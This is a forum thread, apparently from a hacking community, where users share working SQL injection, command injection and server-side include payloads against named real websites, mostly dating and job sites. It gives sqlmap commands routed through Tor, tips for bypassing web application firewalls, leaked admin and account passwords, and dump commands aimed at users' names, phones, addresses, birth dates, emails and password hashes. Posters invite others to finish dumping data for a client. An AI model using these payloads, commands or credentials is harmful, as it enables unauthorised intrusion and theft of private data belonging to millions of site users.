
Interesting SQL inj & XSS that have been found

Xrenovi4 (registered 02.10.2018)
A general thread for posting the SQL inj and XSS you have found.

Well, I'll start the thread myself ;)


--url="https://info.teradata.com/doclist.cfm?Prod=1016&ProdName=IntelliFlex Platforms" --random-agent --level=5 --risk=3 --threads=5 --dbs


Parameter: Prod (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
Payload: Prod=1016 AND 4992 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(113)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4992=4992) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(122)+CHAR(113)))&ProdName=IntelliFlex Platforms
---

web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ColdFusion, Microsoft IIS 7.5, JSP
back-end DBMS: Microsoft SQL Server 2012

available databases [5]:
[*] info
[*] master
[*] model
[*] msdb
[*] tempdb
 


The WAF didn't let me get the DBMS name

Parameter: page (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: itemsPerPage=24&page=-8997 OR 5440=5440&sortBy=best&typeahead=vta-no-cat-images-no-flyout-with-prim-cat book-case &words=book case


web application technology: Apache
back-end DBMS: MySQL 8 (MariaDB fork)

current user is DBA: True

 
///// The WAF didn't let me get the DBMS name ////

The site https://www.westelm.com is behind a ModSecurity (OWASP CRS)
Generic Detection results:
The site https://www.westelm.com seems to be behind a WAF or some sort of security solution
Reason: The server returned a different response code when a string trigged the blacklist.

Try --tamper=modsecurityversioned or modsecurityzeroversioned
You can also combine it with space2comment and/or randomcase
 
Already tried that)
 
You didn't try hard enough. Stock ModSec is primitive; there may be custom modifications in there, or ModSec may be layered on top of other WAFs to throw you off. Also try sending POST instead of GET. There are also options like the X-Forwarded-For + X-Ordinating-IP + X-Remote-IP + X-Remote-Addr + X-Client-IP headers set to local 127.0.0.1 or to the IP of a trusted host (a Cloudflare or Incapsula proxy, for example), or, if it can be found through Shodan, Censys, ViewDNS and the like, then set the Host header to the hostname and go to the IP directly (set the X headers to the host IP as well, and send only the domain name as the hostname).
 
I was thinking of keeping this for the contest article, but there won't be an article.
https://networking.ringofsaturn.com/search.php?ul=networking.ringofsaturn.com&q=123|uname -a%26
Command injection + server misconfig.
The vulnerable field is the search box, and the incorrect server configuration lets you get maximum privileges.
https://networking.ringofsaturn.com...ingofsaturn.com&q=123|sudo -u root -i whoami&
 
"I was thinking of keeping this for the contest article" and that's exactly what you should have done! Stuff like this is quite relevant. Babdrug, you underestimate yourself. Flooding is just not your thing. But you understand the subject well enough. I personally would have backed your candidacy. And you do pretty well in CTF too. You shouldn't have...
 
I don't want to write yet another crap article, there are enough of those without me. Unfortunately there's no time to write something decent. I'll definitely prepare better for the next contest.
 
http://мфц-новоорск.рф/service_overview?id=130 UnIoN SeLEcT 1,2,3,concat(user_hash),5,6,7,8,9,10,11,12,13,14,15 from users
 
Code:
POST /invar/search.php HTTP/1.1
Host: loveme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060629 Firefox/1.5.0.4
Connection: close
Referer: http://loveme.com/invar/search.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 168
Cookie: cslhVISITOR=565f175eed5f83f5912f71fb80458776; LTJUID=WpacoK3AE4MAACGXyNwAAAAl; LASTLTJUID=WpacoK3AE4MAACGXyNwAAAAl; ECDATE=LORuFQayLp40ab9bJauaZA%3D%3D; UASTR=9CWclTZWVYczqDBNmd25YyuajCDL%2BvVszPRROTLgN8R95SQVmwJ7Y1ARS4dEchCCPXuwiNwFva0oXyCu7q7yP30jR29mSsCAhHTPWo2xQv7rkg1AsXnoEw%3D%3D; FERRA=onCoJZVozhDim3jzyI6niWP0%2BhiTdK4o; TERRA=onCoJZVozhDim3jzyI6niWP0%2BhiTdK4o; FLAND=onCoJZVozhDim3jzyI6niY8dcA89332wZtDflnJXlcg%3D; LLAND=onCoJZVozhDim3jzyI6niY8dcA89332wZtDflnJXlcg%3D; FVDATE=vwez2XhSPE5HizyCp9%2Bo2w%3D%3D; LVDATE=vwez2XhSPE5HizyCp9%2Bo2w%3D%3D; STRING=deleted; NEWSTRING=deleted; _uvc=7151981993679575%3Aa0cfe1611a8e0dfc1393dcd5b5c41cdd%3A1519819936%3A; client=John@example.com&John Jacobson&John Jacobson&666&Winterville&WI&36310&US; PHPSESSID=f0086cf0cf626a02d4c71de5404aa72a; file=4edeb34af21c1cbd4dbea22d4141b5df1519820006

weight_min=75&age_begin=18&height_ft_min=%22--%3e'--%3e%60--%3eMAGIC<!--#exec cmd="ls -la" -->MAGIC'&weight_max=145&height_ft_max=6&wpp=7&page=1&submit=Next&age_last=45


bullsh#t, look where the quote goes...

Next
in sqlmap

http://site2date.com/ - check it, it's buggy too.


http://www.rbrides.com/admin/

http://www.rbrides.com/chat/admin/

office@site2date.com : admin : kazan2014
795509507c1c78ba896b292ab6dd9071

-D dbride_utf8 -T profiles -C email,gender,pass,name,country,reg_time --where="gender=1" --start=206000 --stop=206010 --dump --dump-format=html --batch --threads=1

68 tables in theory. Dunno, maybe they've added some.

[INFO] the SQL query used returns 60 entries

[68 tables]
+--------------------------------+
| view |
| arrowchat |
| arrowchat_admin |
| arrowchat_applications |
| arrowchat_banlist |
| arrowchat_chatroom_banlist |
| arrowchat_chatroom_messages |
| arrowchat_chatroom_rooms |
| arrowchat_chatroom_users |
| arrowchat_config |
| arrowchat_graph_log |
| arrowchat_notifications |
| arrowchat_notifications_markup |
| arrowchat_smilies |
| arrowchat_status |
| arrowchat_themes |
| arrowchat_trayicons |
| black_list_ip |
| black_list_mail |
| chat_arrow_sessions |
| chat_messages |
| chats |
| contacts |
| flashcoms_mp3player_playlists |
| flashcoms_mp3player_songs |
| flashcoms_recorder |
| folders |
| hotlist |
| last_actions |
| last_notifications |
| last_subscriber |
| mail_errors |
| mail_queue |
| mail_spam |
| meet_query |
| meets |
| multicards_orders |
| oauth_connections |
| oauth_providers |
| operators |
| payment_orders |
| payments |
| photos |
| photos_rating |
| pm |
| pm_phrases |
| presents |
| profile_contact_info |
| profiles | '242585' men.
| profiles_abuses |
| profiles_presents |
| query |
| referers |
| show_interest |
| special_offers |
| transactpro |
| transactpro_archive |
| verification_log |
| verification_payment_log |
| verification_profiles |
+--------------------------------+

----------------------------------



Database: dbride_utf8
Table: profiles
[106 columns]
+-------------------------+---------------------------+
| Column | Type |
+-------------------------+---------------------------+
| abuses | smallint(5) unsigned |
| age | tinyint(4) unsigned |
| allow_pm | tinyint(1) |
| bademail | tinyint(3) unsigned |
| birthday | date |
| body | mediumint(8) unsigned |
| body_stuff | smallint(5) unsigned |
| children | tinyint(3) unsigned |
| city | smallint(5) unsigned |
| city_other | varchar(50) |
| cookLang | char(2) |
| country | smallint(6) unsigned |
| cusines | int(11) unsigned |
| disable_mail | smallint(1) |
| drinking | smallint(5) unsigned |
| drugs | smallint(5) unsigned |
| edit_time | int(11) |
| education | tinyint(4) unsigned |
| email | varchar(50) |
| ethnicity | mediumint(8) unsigned |
| excited | mediumint(8) unsigned |
| eyes | mediumint(8) unsigned |
| female_vip | int(10) |
| gender | tinyint(3) unsigned |
| getero | tinyint(4) unsigned |
| going_out | int(11) unsigned |
| gold_exp | int(10) |
| gomo | tinyint(4) unsigned |
| hair | mediumint(8) unsigned |
| height | mediumint(8) unsigned |
| hobby | int(11) unsigned |
| hotlist_from | smallint(5) unsigned |
| hotlist_to | int(11) |
| ID | mediumint(8) unsigned |
| income | tinyint(3) unsigned |
| interest | int(10) unsigned |
| ip | varchar(45) |
| lang | mediumint(8) unsigned |
| last_act | int(11) unsigned |
| last_bonus_time | int(11) unsigned |
| last_check | int(11) unsigned |
| last_mail | int(11) unsigned |
| last_notification_check | int(11) unsigned |
| last_notification_mail | int(11) unsigned |
| lifestyle | int(10) unsigned |
| like_in_sex | int(10) unsigned |
| live_in | smallint(5) unsigned |
| lookingfor | tinyint(3) unsigned |
| main_photo | mediumint(8) unsigned |
| marital | smallint(5) unsigned |
| meet_age_from | tinyint(4) unsigned |
| meet_age_to | tinyint(4) unsigned |
| meet_city | smallint(5) unsigned |
| meet_city_other | varchar(50) |
| meet_country | smallint(5) unsigned |
| meet_daytime | tinyint(4) unsigned |
| meet_for | mediumint(8) unsigned |
| meet_target | tinyint(3) unsigned |
| music | int(11) unsigned |
| name | varchar(50) |
| new_message | tinyint(1) |
| occupation | varchar(50) |
| orientation | tinyint(3) unsigned |
| paid | int(10) unsigned |
| partner_age_from | tinyint(4) unsigned |
| partner_age_to | tinyint(4) unsigned |
| partner_city | smallint(5) unsigned |
| partner_city_else | varchar(50) |
| partner_country | smallint(5) unsigned |
| partner_height_from | mediumint(8) unsigned |
| partner_height_to | mediumint(8) unsigned |
| partner_info | text |
| partner_subscribed | tinyint(1) |
| partner_weight_from | mediumint(8) unsigned |
| partner_weight_to | mediumint(8) unsigned |
| partner_zodiac | smallint(5) unsigned |
| pass | varchar(50) |
| penis_size | smallint(5) unsigned |
| photo | tinyint(1) unsigned |
| rating | smallint(5) unsigned |
| reg_time | int(11) unsigned |
| religion | mediumint(8) unsigned |
| relocate | tinyint(1) |
| self_info | text |
| send_notification | smallint(1) unsigned |
| sex_freq | tinyint(4) unsigned |
| show_int_from | int(11) |
| show_int_to | int(11) |
| smoking | smallint(5) unsigned |
| sport | int(11) unsigned |
| state | varchar(50) |
| status | tinyint(1) |
| subscribe | tinyint(1) |
| suspicious | tinyint(3) unsigned |
| target | mediumint(9) unsigned |
| tits_size | smallint(5) unsigned |
| units | double unsigned |
| verified | tinyint(3) unsigned |
| video | varchar(255) |
| video_status | tinyint(1) unsigned |
| view_from | int(11) |
| view_to | int(11) |
| want_children | tinyint(1) |
| weight | mediumint(8) unsigned |
| zip | varchar(10) |
| zodiac | smallint(6) unsigned |
+-------------------------+---------------------------+


Dump it yourselves. I can't be bothered, the client bailed.
 
POST /events/ HTTP/1.1
Host: www.relatieplanet.nl
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060629 Firefox/1.5.0.4
Connection: close
Referer: https://www.relatieplanet.nl/events/
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
Cookie: .RP_SESSION=ksfw1hcxf5mzgufjqpvxtkw5; RP_COOKIE=Xzwe0MvAGgcfR3Siwk4unerdix7SJZKxP17RsZUnzP6TCX8+uurQma1qiEKs9vDwUHVeDOxW3ivb8Cr6U4afa8zz/tIG6VqA/NPnD0LFO9XvNp9PjvbXLADLnt0C3aZcbG21VBqAFDWZl4g5xv6+KaV4py/GzFyGdqKerQ+0pbq5aiqtbTB5qBeeovZIChuu; RP_EVENTS=Xzwe0MvAGgcfR3Siwk4unerdix7SJZKxP17RsZUnzP6df1brD4zMN+R6IxbHp+y2e4z9nrsg5sHEFJV/VLbOH17rWFh/dtfVn19z5+MlaFf0ZS5APl2++8J+EcxthywoFHc+HFOa/zt72wYWXIqIuoH3jsHvWohxJM4p4yUWmSAy/H4pliC4ATBDQ3+VUpIZ; RPSessionId=s1|WmiZU

sortDescending=False&EventsResultatenViewModel.Paging.CurrentPage=1&sortKey=*


Hostname RLP-SQL1.
current database: 'relatieplanet'

Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace
Payload: sortDescending=False&EventsResultatenViewModel.Paging.CurrentPage=1&sortKey=(SELECT (CASE WHEN (9828=9828) THEN 9828 ELSE 9828*(SELECT 9828 UNION ALL SELECT 6309) END))
Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
---
web server operating system: Windows 8.1 or 2012 R2
web application technology: Apache, Microsoft IIS 8.5
back-end DBMS: Microsoft SQL Server 2012

database management system users [2]:
[*] RLP-SQL1\\WWW-relatieplanet
[*] sa

-r путь:/relatie --batch --level=5 --risk=3 --dbms="Microsoft SQL Server 2012"

Database: relatieplanet
+----------------------------------+---------+
| Table | Entries |
+----------------------------------+---------+
| dbo.SysteemMails | 37819608|
| dbo.Profiel_Favorieten | 4985794 |
| dbo.Profielen | 1461863 |
| dbo.AffiliateHit | 1343976 |
| dbo.AffiliatePublishers | 1178246 |
| dbo.ProfielfotoPath | 1135846 |
| dbo.ProfielFotos | 1135843 |
| dbo.ProfielBlokkades | 891581 |
| dbo_OptivoUpdates | 876153 |
| dbo.Profiel_Abonnementen | 618550 |
| dbo.Betalingen | 489479 |
| dbo.LoginPogingen | 355449 |
| dbo.MatchMailHistory | 299247 |
| dbo.Flirts | 281116 |
| dbo.AffiliatePublisherProfiel | 221223 |
| dbo_OnlineStatistieken | 212906 |
| dbo.Betaallinks | 168922 |
| dbo.AdyenPaymentResponses | 162987 |
| dbo.PotentialFlirts_1 | 157252 |
| dbo.PotentialFlirts_2 | 157251 |
| dbo.EspOptivo | 143242 |
| dbo.IpRanges | 100623 |
| dbo.MatchMailMatches | 66014 |
| dbo.PotentialFlirts_test | 65425 |
| dbo._profilersignalr | 57590 |
| dbo.AdyenNotifications | 36284 |
| dbo._BACKUP_Bounces | 27979 |
| dbo.Kortingscodes_Uitgegeven | 22181 |
| dbo_OauthRefreshTokens | 18839 |
| dbo.FullMembers | 16721 |
| dbo.[_listRecipients_30-05-2017] | 13733 |
| dbo.IncassoDossiers | 13002 |
| dbo.BULK_OptivoBounces | 12889 |
| dbo.Profielen_ResetKeys | 12677 |
| dbo.Postcodegebieden | 6766 |
| dbo.Kortingscodes | 5327 |
| dbo.Bounces | 5067 |
| dbo.EventDeelnemers | 4536 |
| dbo._tmg_Postcodetabel | 4044 |
| dbo.Kortingscodes_Profielen | 2772 |
| dbo.Gebruikers_Log | 1016 |
| dbo.BlacklistItems | 753 |
| dbo.Abonnementen_Websites | 466 |
| dbo.Layouts | 385 |
| dbo.MatchMailQueue | 382 |
| dbo.Krabbels | 279 |
| dbo.LayoutContents | 247 |
| dbo.Landen | 241 |
| dbo.Abonnementen | 236 |
| dbo.BULK_OptivoUpdates | 215 |
| dbo.Inzets | 209 |
| dbo.Inzet_Html | 186 |
| dbo.Teksten | 148 |
| dbo.Gebruikers | 130 |
| dbo.BlogItems | 103 |
| dbo.Emailtemplates | 78 |
| dbo.__MigrationHistory | 65 |
| dbo.Events | 63 |
| dbo.EventPhotos | 52 |
| dbo.EmailadresBlokkades | 45 |
| dbo.FooterMenuItems | 38 |
| dbo.FaqVragen | 31 |
| dbo.FaqCategorien | 25 |
| dbo.Betaalmethodes | 24 |
| dbo.Answers | 19 |
| dbo.PageHeaderTopMenuItems | 19 |
| dbo_Opleidingsniveaus | 17 |
| dbo.CarrouselItems | 16 |
| dbo.Carrousels | 16 |
| dbo.Affiliates | 11 |
| dbo.Banners | 11 |
| dbo.ProfielFotoVerwijderRedenen | 11 |
| dbo.LayoutTemplateRows | 10 |
| dbo.Inzet_SinglesFotos | 8 |
| dbo.Inzet_Usps | 6 |
| dbo.PageHeaders | 6 |
| dbo.sysdiagrams | 6 |
| dbo.EventTestimonials | 5 |
| dbo.HeaderImages | 5 |
| dbo.IncentiveQueue | 5 |
| dbo.Inzet_Quotes | 5 |
| dbo.Inzet_Events | 4 |
| dbo.Inzet_Kortingscode | 4 |
| dbo.Footers | 3 |
| dbo.Inzet_Visuals | 3 |
| dbo.Gebruikers_ResetKeys | 2 |
| dbo.Websites | 2 |
| dbo.Inzet_Statistiek | 1 |
| dbo.LayoutTemplates | 1 |
| dbo_OauthClients | 1 |
+----------------------------------+---------+


4 million in total.
 
-u https://www.knuz.nl/search.php?s_geslacht=1&s_land=147&s_provincie=10&s_zoeknaar=2&s_leeftijdlaag=26&s_leeftijdhoog=36&idx=0 -p "s_land,s_provincie" --level=5 --risk=3 --batch --dbms="MySQL"

web server operating system: Linux Debian 6.0 (squeeze)
web application technology: Apache, PHP 5.3.3, Apache 2.2.16
back-end DBMS: active fingerprint: MySQL >= 5.5.0
comment injection fingerprint: MySQL 5.5.46
banner parsing fingerprint: MySQL 5.5.46, logging enabled
banner: '5.5.46-0+deb6u1-log'

current user: 'kdbuser@195.242.99.22_'
current database: 'knuz'
hostname: 'dl385'


python sqlmap.py --tor --tor-port=9150 --tor-type=SOCKS5 --check-tor --threads=200 --time-sec=15 --random-agent -v 3 --sqlmap-shell

Query via --sql-shell: SELECT password FROM user WHERE email LIKE 'knuz_28642%'

https://www.knuz.nl/admin/index.php admin panel

Account for scanning
irinaforlove@gmail.com:5856



available databases [4]:
[*] information_schema
[*] knuz +
[*] knuz_archief +
[*] websessions +

Database: websessions
+-----------+---------+
| Table | Entries |
+-----------+---------+
| knuz_sess | 259 |
+-----------+---------+
------------------------------

Database: knuz_archief
+----------------+---------+
| Table | Entries |
+----------------+---------+
| t_mail2013_txt | 3606865 |
| t_mail2015_txt | 3307373 |
| t_mail2014_txt | 3282891 |
| t_mail2013_dat | 3073033 |
| t_mail2015_dat | 2979561 |
| t_mail2014_dat | 2879358 |
| t_mail2009_txt | 2676757 |
| t_mail2009_dat | 2676755 |
| t_mail2008_txt | 1810497 |
| t_mail2008_dat | 1810486 |
+----------------+---------+
-----------------------------------

Database: knuz
[35 tables] Entries
+--------------------------------+
| t_mail_all_txt | 37572825 | +
| t_mail_all_dat | 36307806 |
| photomatch | 27936035 | +
| t_mail_txt | 6497025 |
| t_mail_dat | 6496994 |
| guestbook | 4703912 |
| chat_message | 2727763 |
| interest | 1893842 |
| ban | 1408970 | +
| `user` | 580430 | +
| wall | 208755 |
| chat | 185792 |
| betaalcodes | 167097 |
| credit_transactions | 137125 | +
| credit_balance | 85480 |
| credit_ideal_t | 18009 |
| fb_users | 14723 |
| misbruik | 13862 |
| metasearch | 8972 |
| lichtkrant | 7991 |
| bloemen_bezorgd | 3015 |
| blockip | 2825 |
| prikbord | 1949 |
| waarbenik | 525 |
| cms_content | 90 | +
| cms_page | 74 |
| iptable | 15 |
| bloemen | 11 |
| cms_lang | 4 |
| cms_site | 2 | +
| meldingen | 2 |
| cms_indexes | 1 |
| profile_extra | 17710 | +
| profile_general | 579071 | +
| profvisit2 | ? | +
+--------------------------------+

+==========================================+
Database: knuz
Table: cms_site
[4 columns]
+--------------+--------------------+
| Column | Type |
+--------------+--------------------+
| default_lang | bigint(8) unsigned |
| id | bigint(8) unsigned |
| lang_support | varchar(50) |
| name | varchar(50) |
+--------------+--------------------+

+==========================================+

Database: knuz
Table: user
[64 columns]
+-------------------+------------------------------+
| Column | Type |
+-------------------+------------------------------+
| accountstatus | tinyint(3) unsigned |
| agecheck | tinyint(4) |
| agreecond | tinyint(3) unsigned |
| anonphone | varchar(20) |
| autologin | tinyint(3) unsigned |
| becamemember | datetime |
| chatstatus | tinyint(1) unsigned zerofill |
| checkmail | tinyint(1) |
| city | varchar(255) |
| country | tinyint(3) unsigned |
| dateofbirth | datetime |
| email | varchar(50) |
| facebook | varchar(40) |
| favorites | longtext |
| feest | tinyint(4) |
| firstname | varchar(255) |
| fotoa | tinyint(4) |
| fotoreview | tinyint(1) |
| guest | tinyint(4) |
| homep | tinyint(4) |
| hyves | varchar(40) |
| id | bigint(8) unsigned |
| ipad | varchar(20) |
| lastaction | datetime |
| lastchanges | datetime |
| lastlogin | datetime |
| lastname | varchar(255) |
| lastsearch | text |
| lat | varchar(8) |
| login | varchar(50) |
| logout | tinyint(3) |
| lon | varchar(8) |
| mailing | tinyint(1) |
| mailnewm | tinyint(1) |
| mobile | varchar(20) |
| mobile_device | varchar(25) |
| mobile_lastaction | datetime |
| mobile_lat | varchar(8) |
| mobile_lon | varchar(8) |
| mobile_pushtoken | text |
| nickname | varchar(50) |
| nofake | tinyint(4) |
| optinok | tinyint(1) |
| password | varchar(50) |
| payedlast | datetime |
| picup | bigint(8) |
| rd_x | smallint(6) |
| rd_y | smallint(6) |
| review | tinyint(1) |
| score | tinyint(4) |
| searchpref | longtext |
| sessionidrm | char(50) |
| sex | tinyint(3) unsigned |
| showbirth | tinyint(4) |
| showonline | tinyint(4) |
| snelmenu | tinyint(4) |
| state | tinyint(3) unsigned |
| stats | tinyint(4) |
| street | varchar(255) |
| telephone | varchar(20) |
| twitter | varchar(40) |
| wallban | tinyint(1) |
| wijkcode | smallint(4) |
| zipcode | char(10) |
+-------------------+------------------------------+

+===================================================+


Database: knuz
Table: profile_general
[59 columns]
+--------------------+---------------------+
| Column | Type |
+--------------------+---------------------+
| alcohol | tinyint(3) unsigned |
| bar | tinyint(3) unsigned |
| books | text |
| build | tinyint(3) unsigned |
| children | tinyint(3) unsigned |
| cinema | tinyint(3) unsigned |
| clothingstyleday | tinyint(3) unsigned |
| clothingstylenight | tinyint(3) unsigned |
| concerts | tinyint(3) unsigned |
| dancing | tinyint(3) unsigned |
| education | tinyint(3) unsigned |
| eyecolour | tinyint(3) unsigned |
| food | text |
| haircolour | tinyint(3) unsigned |
| hairkind | tinyint(3) unsigned |
| hairlength | tinyint(3) unsigned |
| haspict | tinyint(3) unsigned |
| height | tinyint(3) unsigned |
| higherage | tinyint(3) unsigned |
| hobbies | text |
| housing | tinyint(3) unsigned |
| id | bigint(8) unsigned |
| idealdate | text |
| karakter | text |
| languages | varchar(255) |
| likepets | tinyint(3) unsigned |
| lookingfor | tinyint(3) unsigned |
| lowerage | tinyint(3) unsigned |
| mailpref | tinyint(4) |
| married | tinyint(3) unsigned |
| message | text |
| movies | text |
| music | text |
| occupation | varchar(255) |
| pets | tinyint(3) unsigned |
| picture | tinyint(3) |
| picup | bigint(8) |
| rateprof | tinyint(4) |
| reactprof | tinyint(4) |
| relationkind | tinyint(3) unsigned |
| religion | tinyint(3) unsigned |
| sexualpref | tinyint(3) unsigned |
| skincolour | tinyint(3) unsigned |
| smoke | tinyint(3) unsigned |
| specialpos | tinyint(4) |
| sport | tinyint(3) unsigned |
| sports | text |
| television | tinyint(3) unsigned |
| televisionprograms | text |
| theater | tinyint(3) unsigned |
| user_id | bigint(8) unsigned |
| vacation | text |
| visible | tinyint(3) unsig |
| wantchildren | tinyint(3) unsigned |
| weight | tinyint(3) unsigned |
| youtube1 | varchar(160) |
| youtube2 | varchar(160) |
| youtube3 | varchar(160) |
| youtube4 | varchar(160) |
+--------------------+---------------------+

+===========================================+

Database: knuz
Table: profile_extra
[10 columns]
+------------+--------------------+
| Column | Type |
+------------+--------------------+
| chat_id | varchar(255) |
| doagecheck | tinyint(4) |
| dohome | tinyint(4) |
| dophoto | tinyint(4) |
| dosnelmenu | tinyint(4) |
| homepage | longtext |
| id | bigint(8) unsigned |
| photoalbum | longtext |
| publichome | tinyint(4) |
| user_id | bigint(8) unsigned |
+------------+--------------------+

+===========================================+


Database: knuz
Table: profvisit2
[4 columns]
+------------+-----------+
| Column | Type |
+------------+-----------+
| count | bigint(8) |
| added | timestamp |
| clicker_id | bigint(8) |
| prof_id | bigint(8) |
+------------+-----------+

+===========================================+

Database: knuz
Table: ban
[3 columns]
+-----------+--------------------+
| Column | Type |
+-----------+--------------------+
| banned_id | bigint(8) |
| id | bigint(8) unsigned |
| maker_id | bigint(8) |
+-----------+--------------------+

+===========================================+


Database: knuz
Table: photomatch
[6 columns]
+-----------+------------------+
| Column | Type |
+-----------+------------------+
| match | int(10) unsigned |
| Datumtijd | timestamp |
| id | int(10) unsigned |
| mailed | tinyint(1) |
| matched | tinyint(1) |
| uid | int(10) unsigned |
+-----------+------------------+

+===========================================+


Database: knuz
Table: cms_content
[5 columns]
+---------+--------------------+
| Column | Type |
+---------+--------------------+
| id | bigint(8) unsigned |
| lang_id | bigint(8) unsigned |
| page_id | bigint(8) unsigned |
| title | varchar(255) |
| txt | longtext |
+---------+--------------------+

+===========================================+

Database: knuz
Table: t_mail_all_txt
[2 columns]
+--------+--------------------+
| Column | Type |
+--------+--------------------+
| body | text |
| id | bigint(8) unsigned |
+--------+--------------------+

+===========================================+

Database: knuz
Table: credit_transactions
[6 columns]
+--------+------------------+
| Column | Type |
+--------+------------------+
| action | varchar(255) |
| date | datetime |
| amount | int(11) |
| id | int(10) unsigned |
| note | text |
| uid | int(10) unsigned |
+--------+------------------+
 
IIS Web Core 7.5

http://ecfriend.com/cmslogin.asp

python sqlmap.py --tor --tor-port=9150 --tor-type=SOCKS5 --check-tor --threads=200 --time-sec=15 --random-agent -v 3 --sqlmap-shell

-r C:/Users/WRK/Desktop/ecfr -p "StoryType" --dbms="Microsoft SQL Server" -o --level=5 --risk=3 --batch --tamper=percentage

---
Parameter: StoryType (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: SimpleAgeFrom=&SimpleAgeTo=&StoryType=1 AND 2819=2819&PageAjaxed=<|12/13/2011 16:55:37|
Vector: AND [INFERENCE]

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: SimpleAgeFrom=&SimpleAgeTo=&StoryType=1 OR 7392=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)&PageAjaxed=<|12/13/2011 16:55:37|
Vector: OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)


[22:31:37] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Apache, ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008




hostname: 'DB4\ECF'
current user is DBA: False



Also almost 2 million from that system.
 
I'll throw in some more job sites, the usual ones where the client went cold.
 
www.hoteljob-deutschland *******

sqlmap


Joomla

http://www.hoteljob-deutschland.de/...* from (select(sleep(20)))a)-- &suchen=Suchen first one

http://www.hoteljob-deutschland.de/...ilter[bis]=all&filter[rang][]=1&suchen=Suchen second one

Third one
GET /index.job.php?option=com_jobportal&id=20768&seo=Chef%20de%20Rang%20(m/f)%20-%205*%20European%20Cruise%20Line.. HTTP/1.1
Host: www.hoteljob-deutschland.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'+(select * from (select(sleep(20)))a)+'
Connection: close

_______________________________________________
Admin panel

http://www.hoteljob-deutschland.de/administrator/


Database: db476799021
Table: jos_jp_admin
[3 entries]
+-----+----------+----------+-------------+
| EID | partner | username | passwort |
+-----+----------+----------+-------------+
| 1 | <blank> | admin | cindy1 |
| 2 | robinson | admin | robinson800 |
| 3 | tui | admin | tui |
+-----+----------+----------+-------------+

THEY DON'T WORK FOR THE ADMIN PANEL!
________________________________________________
-u http://www.hoteljob-deutschland.de/...ilter[bis]=all&filter[rang][]=1&suchen=Suchen -p "filter%5Brang%5D%5B%5D" --risk=3 --dbs --dbms=MySQL --batch -v 3

-u http://www.hoteljob-deutschland.de/...ilter[bis]=all&filter[rang][]=1&suchen=Suchen --tables -v 3 --batch --columns


-u http://www.hoteljob-deutschland.de/...ilter[bis]=all&filter[rang][]=1&suchen=Suchen -D db476799021 -T jos_jp_bewerber -C name,vorname,telefon,geburtsdatum,email,passwort --dump
 
Check everything with sqlmap, I made notes after all.
 
http://www.trabajos.com/

https://www.trabajos.com/admin/ admin panel

Try all risk levels

/ofertasporemail/alta/?idc=12&area=144155133'%20or%20'404'%3d'404&profesion=2&pais=100&provincia=122 !!!

/ofertas-internacionales/?PALABRACLAVE=&AREA=&PAIS='%2b(select%20*%20from%20(select(sleep(20)))a)%2b'&desde=10 !!!

'5.0.51a-24+lenny5-log'
current user: 'trabajos2007@192.168.20.%'
current database: 'trabajos2007'
hostname: 'hvm143v'
current user is DBA: False
available databases [7]:
[*] information_schema
[*] test
[*] trabajos2007
[*] trabajos2007_openjobs
[*] trabajos2007_sao
[*] trabajos2007_soporte
[*] trabajos2007_termometro_stat

database management system users privileges:
[*] %trabajos2007% [1]:
privilege: USAGE

+----------------+---------+
| Table | Entries |
+----------------+---------+
| B027_CANDIDATO | 3289756 |

B001_USUARIO: '3291988'

T001_USUARIO '1593947'

http://www.trabajos.com/ofertas-int...rom+information_schema.tables))a)+'&desde=101 in Opera, if checking table names by hand

---------------------------------------
sqlmap-shell> -u https://www.trabajos.com/ofertas-internacionales/?PALABRACLAVE=&AREA=&PAIS=1&desde=10 --dbms=MySQL -p "PAIS" -v 3 --no-cast? (seems it's not needed anymore) --tamper="modsecurityversioned" Work it with this one!

---------------------------------------
On dumping users

All the user info is here, except the password

D:\sqlmap-v-1\sqlmap.py --tor --tor-port=9150 --tor-type=SOCKS5 --check-tor --threads=250 --time-sec=50 --random-agent --sqlmap-shell

select concat_ws(0x3a,T027_NOMBRE,T027_APELLIDOS,T027_TELEFONO1,T027_POBLACION,T027_DIRECCION,T027_CODPOSTAL,T027_FECHA_NACIMIENTO,T027_EMAIL) from B027_CANDIDATO where T027_IDCANDIDATO=1193999911

first name, last name, phone, town, address, postal code, DOB, email

-u https://www.trabajos.com/ofertas-internacionales/?PALABRACLAVE=&AREA=&PAIS=1&desde=10 -T T027_CANDIDATO -C T027_NOMBRE,T027_APELLIDOS,T027_TELEFONO1,T027_POBLACION,T027_DIRECCION,T027_CODPOSTAL,T027_FECHA_NACIMIENTO,T027_EMAIL -D trabajos2007 --dump --tamper="modsecurityversioned" --start=1000000 --stop=1400000

____________________

Here: email + hash

concat_ws(0x3a,T001_IDUSUARIO,T001_NICK,T001_CODCR) from trabajos2007.B001_USUARIO

